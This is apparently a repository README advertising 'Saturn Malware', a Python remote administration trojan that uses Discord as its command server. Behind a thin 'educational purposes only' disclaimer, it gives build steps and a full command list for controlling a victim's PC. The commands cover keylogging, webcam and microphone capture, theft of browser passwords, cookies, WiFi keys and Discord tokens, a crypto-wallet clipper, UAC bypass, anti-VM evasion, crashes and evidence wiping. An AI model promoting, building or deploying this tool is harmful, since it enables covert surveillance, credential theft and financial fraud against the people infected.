
The MOST powerful Remote Administration Tool that uses Discord as C2. This means you can control your devices through Discord.

Primary LanguagePythonMIT LicenseMIT

Saturn Malware

Saturn Malware

The MOST powerful Remote Administration Tool that uses Discord as C2. This means you can control your devices through Discord.

Table of contents


Information and code provided on this repository are for educational purposes only. The creator is no way responsible for any direct or indirect damage caused due to the misusage of the information. Everything you do, you are doing at your own risk and responsibility.


- handle multiple PCs (not only one, like in most of the cases)
- UAC Bypass (gain Administrative permissions on startup)
- delete itself whenever you want
- log every key pressed on keyboard (keylogger)
- take screenshots anytime you want
- record screen anytime you want
- elevate itself to critical process (will trigger Blue Screen of Death when killed)
- directly manipulate victim's PC graphics (display custom "things"->[bitmaps, images, texts, glitch effects])
- turn off/on monitors of victim's PC
- block access to any website
- browse and kill running processes
- disable processes (make certain processes impossible to run)
- communicate with the victim in several ways
- use Text-To-Speech on victim's PC
- take images from webcam
- block the mouse and keyboard
- steal saved WiFi passwords
- grab history, cookies and passwords saved in web browsers
- grab discord tokens
- grab system information
- manipulate Windows sounds settings (change the volume)
- play audio files on victim's PC (in background)
- record microphone input (24/7) and save it in .wav files
- stream live microphone input on voice channel
- browse files on target PC
- upload and download files from target PC
- remove files from target PC
- execute files on target PC
- replace copied crypto currency wallet addresses to your [configured] ones
- trigger jumpscares
- trigger Blue Screen of Death
- execute fork bomb (crash the PC)
- Anti-VM (Saturn won't run on Virtual Machines, f.ex.: VirtualBox, VMWare)
- run shell commands (CMD/Powershell)
- Debug Mode for easier testing and `contribution`


This script is for educational purposes only. Use it at your own risk. The developer is not responsible for any damage caused by the misuse of this script.


• Download and install Python 3 (Make sure to enable the Add to PATH option.)

• Verify the installation by executing python --version in CMD.

• Download Saturn Malware.

• Create a Discord a server and bot token

• Extract the zip file.

• Navigate to the Saturn Malware folder and double click install.bat file.

• After it downloads the requirement double click Saturn.bat

• Paste Server ID and Discord Bot Token in Saturn.bat

• Fill in the fields of the builder and press the Build button`


.ss - take screenshot at any time
.screenrec - record the screen for 15 seconds
.critical-enable - elevates the process to critical status (.critical-disable to undo)
.display-graphic - manipulate low-level graphics by displaying pixels prepared in DrawlingStudio
.display-glitch <name> - display specified screen glitch
.monitors-off - turn off all monitors (.monitors-on to turn back on)
.website-block <website> - block specified website from being accessed from any browser (.website-unblock <website> to unblock it)
.show <what-to-show> - get list of running processes or available commands
.kill <process-name-or-id> - kill any running process
.blacklist <process-name> - adds specified process to the blacklist (victim won't be able to run it)
.whitelist <process-name> - removes specified process from the blacklist (victim will be able to run it)
.foreground - get active window process name
.msg title="<title>" text="<text>" style=<style> - send a message to victim and get the response
.tts <message> - plays a Text-to-Speech message on victim's PC
.webcam <action> - use connected webcam (currently supports photos shooting)
.block-input - block the mouse and keyboard(.unblock-input to unblock it)
.grab <what-to-grab> - grab for example saved passwords in web browsers
.volume <value> - change the audio output volume on victim's PC
.play [<file>] - play any .mp3 file on the victim's PC (existing one or sent in the next message if no filename was provided)
.join - join voice-channel and stream live microphone input
.pwd - show working directory
.ls - list content of working directory
.tree - show tree of working directory
.cd <directory> - change working directory
.upload <type> [<name>] - upload any file or zipped directory (also greater than 8MB ones) onto target PC
.download <file-or-directory> - download any file or zipped directory (also greater than 8MB ones) from target PC
.remove <file-or-directory> - remove file or directory on target PC
.execute <file> - run any file on target PC
.start-clipper - start crypto-clipper (swap crypto currency wallet addresses to your ones)(.stop-clipper to stop it)
.jumpscare [<preset>] - play very loud and rapidly flashing video or other graphics
.bsod - trigger Blue Screen of Death
.forkbomb - execute fork bomb
.cmd <command> - execute shell command on victim's PC and send back the output
.implode - remove Saturn from target PC and clean the "evidence"
.clear - clear messages from file-related channel


• By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see https://commonsclause.com/.